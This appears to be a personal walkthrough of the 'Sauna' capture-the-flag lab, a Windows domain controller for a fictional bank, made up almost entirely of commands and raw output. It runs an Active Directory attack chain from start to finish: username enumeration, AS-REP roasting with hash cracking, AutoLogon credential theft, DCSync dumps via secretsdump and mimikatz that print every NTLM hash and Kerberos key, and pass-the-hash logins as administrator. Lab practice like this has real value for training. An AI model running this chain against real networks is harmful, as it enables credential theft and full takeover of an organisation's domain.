Â
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Egotistical Bank :: Home |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-01 15:02:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49668/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49725/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (88%) Aggressive OS guesses: Microsoft Windows Server 2019 (88%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h00m00s | smb2-time: | date: 2024-01-01T15:03:18 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required
Â
Â
EGOTISTICAL-BANK.LOCAL
┌──(root㉿kali)-[~/Desktop/Sauna] └─# GetNPUsers.py Egotistical-bank.local/ -dc-ip 10.10.10.175 Impacket v0.11.0 - Copyright 2023 Fortra No entries found!
Â
┌──(root㉿kali)-[~/Desktop/Sauna] └─# ldapsearch -x -H ldap://10.10.10.175 -b "dc=Egotistical-bank,dc=local"
# Hugo Smith, EGOTISTICAL-BANK.LOCAL dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Â
name.txt: Hsmith HSmith HugoSmith HugoS Hugo Hugos Hugo
./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL --dc EGOTISTICAL-BANK.LOCAL ../Sauna/name.txt 2024/01/01 18:26:44 > [+] VALID USERNAME: HSmith@EGOTISTICAL-BANK.LOCAL
name.txt: FergusSmith FergusS FSmith ChaunCoins CCoins ChaunC HugoBear HBear HugoB BowieTaylor BTaylor BowieT SophieDriver SophieD SDriver StevenKerb SKerb StevenK ShaunCoins SCoins ShaunC
../Tool/kerbrute_linux_amd64 userenum --dc EGOTISTICAL-BANK.LOCAL -d EGOTISTICAL-BANK.LOCAL ./name.txt
2024/01/01 19:00:35 > [+] VALID USERNAME: FSmith@EGOTISTICAL-BANK.LOCAL
Â
GET TGT by GetNPUsers.py
┌──(root㉿kali)-[~/Desktop/Sauna] └─# GetNPUsers.py Egotistical-bank.local/fsmith -dc-ip 10.10.10.175 -request -no-pass Impacket v0.11.0 - Copyright 2023 Fortra [*] Getting TGT for fsmith $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:5e0e4ea398a0894d71ca76e0c72b07d3$5ee7e0d01e133bf7fc14cc6d6ea1f7eccb5bb75ebc36a543ea9250400f9bc239055ca79ddd72bbab93b8de3ad2fa5c177e7dceb70edacdaaa3afe86e5c53082a33956fcf9ee2f76e94b1f3baa692087e1a85ee133fe9b190f79bcf1d45c317eac34642027fb706263a3b76c5b359aa0f40d4bde03289d4068ff134043e8d78ffef3e509a9af8412a0353a88967f9d75feadb092e7dbdd9ac8e7e3adace2c70424349fd9940b94794bbc8f5b00c018aac219fa2c2612d74bb68f210d028837036ebff876d3793dc3821adca3b68608fb50188feb3e256d3da45432abe6247e33d522bf53c9a6962ab264128c267cc82187360d3f7d29c9ea581e1f0d57bdd48c9
Â
hashcat -m 18200 ./tgt.txt /usr/share/wordlists/rockyou.txt
Thestrokes23
evil-winrm -u fsmith -p 'Thestrokes23' -i EGOTISTICAL-BANK.LOCAL
Â
Â
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user User accounts for \\ ------------------------------------------------------------------------------- Administrator FSmith Guest HSmith krbtgt svc_loanmgr
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user fsmith /domain User name FSmith Full Name Fergus Smith Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 1/23/2020 8:45:19 AM Password expires Never Password changeable 1/24/2020 8:45:19 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 1/1/2024 11:10:04 AM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *Domain Users The command completed successfully.
Result of Winpeas.exe:
Looking for AutoLogon credentials Some AutoLogon credentials were found DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround!
Â
reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"\
evil-winrm -u svc_loanmgr -p 'Moneymakestheworldgoround!' -i 10.10.10.175
Â
Â
use Sharphound.exe to collect AD info
Â
secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
┌──(root㉿kali)-[~/Desktop/Sauna] └─# secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@EGOTISTICAL-BANK.local' Impacket v0.11.0 - Copyright 2023 Fortra [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:838e81ccfe72b6f52512c56f56935bdd::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e Administrator:des-cbc-md5:fb8f321c64cea87f krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:b748b00c8436e96524b0cd3abf39df21438107098df0c5d4d811f81f8987b95e SAUNA$:aes128-cts-hmac-sha1-96:5a1b125d898779090e63a8787e47db42 SAUNA$:des-cbc-md5:a8fe68736d8f2aba [*] Cleaning up...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Â
wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175
Â
Â
another way:
Â
upload mimikatz to windows
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> .\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator [DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain [DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server [DC] 'administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) Account expiration : Password last change : 7/26/2021 8:16:16 AM Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500 Object Relative ID : 500 Credentials: Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f lm - 0: 365ca60e4aba3e9a71d78a3912caf35c lm - 1: 7af65ae5e7103761ae828523c7713031 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 716dbadeed0e537580d5f8fb28780d44 * Primary:Kerberos-Newer-Keys * Default Salt : EGOTISTICAL-BANK.LOCALAdministrator Default Iterations : 4096 Credentials aes256_hmac (4096) : 42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 aes128_hmac (4096) : a9f3769c592a8a231c3c972c4050be4e des_cbc_md5 (4096) : fb8f321c64cea87f OldCredentials aes256_hmac (4096) : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031 aes128_hmac (4096) : 145e4d0e4a6600b7ec0ece74997651d0 des_cbc_md5 (4096) : 19d5f15d689b1ce5 OlderCredentials aes256_hmac (4096) : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef aes128_hmac (4096) : 52c02b864f61f427d6ed0b22639849df des_cbc_md5 (4096) : d9379d13f7c15d1c * Primary:Kerberos * Default Salt : EGOTISTICAL-BANK.LOCALAdministrator Credentials des_cbc_md5 : fb8f321c64cea87f OldCredentials des_cbc_md5 : 19d5f15d689b1ce5 * Packages * NTLM-Strong-NTOWF * Primary:WDigest * 01 b4a06d28f92506a3a336d97a66b310fa 02 71efaf133c578bd7428bd2e1eca5a044 03 974acf4f67e4f609eb032fd9a72e8714 04 b4a06d28f92506a3a336d97a66b310fa 05 79ba561a664d78d6242748774e8475c5 06 f1188d8ed0ca1998ae828a60a8c6ac29 07 801ddc727db9fa3de98993d88a9ffa8b 08 a779e05da837dd2d303973304869ec0f 09 ac2c01846aebce4cbd4e3ec69b47a65d 10 6d863d6ae06c3addc49b7a453afe6fa0 11 a779e05da837dd2d303973304869ec0f 12 6676b9fdd4aa7f298f1ada64c044c230 13 5a01167d750636d66e5602db9aece9b7 14 f702282bd343c2fee7b98deac8950390 15 a099aa3c81f1affeba59d79a6533f60d 16 4bae84b8f0b0306788ff9bda4acb3bd4 17 976d547fb9e04b0ac5ec60508c275da1 18 50c302b71d0e08a1a2be14b56225645f 19 edb19e08653443695f6d3599e0a6bddf 20 c497465ddc6e2fc14cb0359d0d5de7f8 21 2ed0b4b57196fb190a66224b2b17029f 22 37d03051ae1cd6046975948564ab01fa 23 d4c7554fe1beb0ed712f50cfec470471 24 8df495fe69cdce409b9f04ea04289b9e 25 40788044be982310920cc0740687fefd 26 db7f66f1f1a8f46274d20cfdda5b6e1c 27 d70226ec52f1ef198c2e1e955a1da9b6 28 abdd681f875a9b3f3a50b36e51692a2c 29 dcd140a2ce2bf70fed7ac0e2b60d0dee mimikatz(commandline) # exit
Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
evil-winrm -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e' -i 10.10.10.175
Â